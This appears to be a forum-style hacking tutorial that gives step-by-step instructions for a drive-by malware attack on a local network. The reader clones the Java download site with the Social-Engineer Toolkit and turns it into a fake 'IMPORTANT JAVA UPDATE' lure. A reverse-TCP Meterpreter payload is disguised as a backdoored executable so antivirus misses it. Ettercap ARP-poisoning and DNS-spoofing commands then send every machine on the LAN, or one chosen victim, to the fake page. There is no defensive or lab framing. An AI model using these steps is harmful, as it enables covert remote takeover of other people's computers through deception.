Step 1: Setting up the Fake-Page
A. Start SET
B. Choose Website Attack Attack Vectors by typing 1
D. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example www.java.com/en/, and after cloning I edited the index.html with changing the JAVA + YOU, DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to use this option, you can simply use the Site-Cloner from SET, too.
E. After choosing your site, you have to choose the Payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.
F. Now you have to choose the encryption of the Payload , so that it wont get detected by the victims AV. Just choose 16 (Backdoored Executable), which is currently the best.
Use ettercap to redirect slave/s to your fake-site
a. The first thing you have to do, is opening the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:
* A yourip
If you only want to redirect one page, write this:
thesiteyouwanttoredirect A yourip
So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):
* A 192.168.0.103
b. Running ettercap
After configuring everything, you can now run the following command:
ettercap -T -q -P dns_spoof -M ARP // //
This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
If you want to redirect only one single PC, you have to run this command:
ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //
And here is what the parameters actually mean:
-T means Text Interface, so you got no annoying GUI
-q means silent mode, ettercap doesnt display everything it does (which were really annoying)
-P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC